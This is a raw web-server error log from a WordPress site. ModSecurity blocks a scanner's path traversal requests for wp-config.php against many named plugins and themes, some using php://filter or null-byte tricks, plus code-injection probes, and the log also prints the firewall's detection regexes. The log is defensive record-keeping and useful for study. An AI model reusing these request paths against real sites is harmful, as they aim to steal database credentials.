72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/filedownload/download.php?path=..%2F..%2F..%2Fwp-config.php&type=aplication%2Fpdf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/filedownload/download.php"] [unique_id "YtsdMnhurfgLch3PImzI2AAAANE"] [Fri Jul 22 16:57:07.207736 2022] [:error] [pid 22471:tid 140017108236032] [client 72.11.157.116:52704] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/markant/download.php?file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/markant/download.php"] [unique_id "YtsdM-CtYZwatdwcM8WrHgAAAEQ"] [Fri Jul 22 16:57:07.303215 2022] [:error] [pid 22470:tid 140017099843328] [client 72.11.157.116:52706] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mtheme-unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mtheme-unus/css/css.php"] [unique_id "YtsdM3xqqtgWgIAXsGFh1gAAAAU"] [Fri Jul 22 16:57:08.015716 2022] [:error] [pid 22472:tid 140017015916288] [client 72.11.157.116:52712] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "YtsdNCpbG8_UBGXeM63xdwAAAI8"] [Fri Jul 22 16:57:08.120475 2022] [:error] [pid 23081:tid 140017116628736] [client 72.11.157.116:52714] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "YtsdNHhurfgLch3PImzI3QAAAMM"] [Fri Jul 22 16:57:08.211038 2022] [:error] [pid 22470:tid 140017049487104] [client 72.11.157.116:52716] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-uploader/upload.php?destinations=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-uploader/upload.php"] [unique_id "YtsdNHxqqtgWgIAXsGFh1wAAAAs"] [Fri Jul 22 16:57:08.969745 2022] [:error] [pid 22472:tid 140016957167360] [client 72.11.157.116:52720] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "YtsdNCpbG8_UBGXeM63xeAAAAJY"] [Fri Jul 22 16:57:09.061096 2022] [:error] [pid 22470:tid 140017015916288] [client 72.11.157.116:52722] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php%2Fwp-content%2Fplugins%2Fhb-audio-gallery-lite%2Fgallery%2Faudio-download.php%3Ffile_path%3D..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "YtsdNXxqqtgWgIAXsGFh2AAAAA8"] [Fri Jul 22 16:57:09.150891 2022] [:error] [pid 23081:tid 140017125021440] [client 72.11.157.116:52724] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "YtsdNXhurfgLch3PImzI3gAAAMI"] [Fri Jul 22 16:57:11.049457 2022] [:error] [pid 23081:tid 140016940381952] [client 72.11.157.116:52734] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "YtsdN3hurfgLch3PImzI4wAAANg"] [Fri Jul 22 16:57:11.163161 2022] [:error] [pid 22470:tid 140016990738176] [client 72.11.157.116:52736] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "YtsdN3xqqtgWgIAXsGFh2QAAABI"] [Fri Jul 22 16:57:11.268362 2022] [:error] [pid 23081:tid 140017099843328] [client 72.11.157.116:52738] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ebook-downloader/ebook_plugin.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ebook-downloader/ebook_plugin.php"] [unique_id "YtsdN3hurfgLch3PImzI5AAAAMU"] [Fri Jul 22 16:57:11.359076 2022] [:error] [pid 23081:tid 140016999130880] [client 72.11.157.116:52742] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-shortcode/inc/force-download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-shortcode/inc/force-download.php"] [unique_id "YtsdN3hurfgLch3PImzI5QAAANE"] [Fri Jul 22 16:57:11.449453 2022] [:error] [pid 22472:tid 140017032701696] [client 72.11.157.116:52744] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MichaelCanthony/download.php?file=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MichaelCanthony/download.php"] [unique_id "YtsdNypbG8_UBGXeM63xeQAAAI0"] [Fri Jul 22 16:57:12.868437 2022] [:error] [pid 22472:tid 140017116628736] [client 72.11.157.116:52752] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kap/download.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kap/download.php"] [unique_id "YtsdOCpbG8_UBGXeM63xegAAAIM"] [Fri Jul 22 16:57:12.965926 2022] [:error] [pid 22470:tid 140017041094400] [client 72.11.157.116:52754] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/oxygen-theme/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "YtsdOHxqqtgWgIAXsGFh2wAAAAw"] [Fri Jul 22 16:57:13.055967 2022] [:error] [pid 22471:tid 140017141806848] [client 72.11.157.116:52756] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/rowe/download/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/rowe/download/download.php"] [unique_id "YtsdOeCtYZwatdwcM8WrIAAAAEA"] [Fri Jul 22 16:57:14.490979 2022] [:error] [pid 23081:tid 140017116628736] [client 72.11.157.116:52762] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-e-commerce/wpsc-includes/misc.functions.php?image_name=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-e-commerce/wpsc-includes/misc.functions.php"] [unique_id "YtsdOnhurfgLch3PImzI6QAAAMM"] [Fri Jul 22 16:57:19.651333 2022] [:error] [pid 22472:tid 140016965560064] [client 72.11.157.116:52780] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:img. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "136"] [id "950911"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: http/1.0 found within ARGS:img: ../wp-config.php?http/1.0?action=revslider_show_image"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "YtsdPypbG8_UBGXeM63xfgAAAJU"] [Sat Jul 23 00:08:42.224297 2022] [:error] [pid 22472:tid 140017141806848] [client 193.201.9.12:35464] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/sistem.php"] [unique_id "YtuCWipbG8_UBGXeM631LQAAAIA"] [Sat Jul 23 00:08:48.380912 2022] [:error] [pid 22472:tid 140017091450624] [client 193.201.9.12:35466] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/sistem.php"] [unique_id "YtuCYCpbG8_UBGXeM631LgAAAIY"] [Sat Jul 23 00:08:54.941634 2022] [:error] [pid 22472:tid 140016982345472] [client 193.201.9.12:35470] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/sistem.php"] [unique_id "YtuCZipbG8_UBGXeM631MAAAAJM"] [Sat Jul 23 06:56:10.545330 2022] [autoindex:error] [pid 2269:tid 140357400499968] [client 94.130.39.106:43196] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jul 23 06:56:15.644901 2022] [autoindex:error] [pid 1589:tid 140357341751040] [client 94.130.39.106:43200] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex 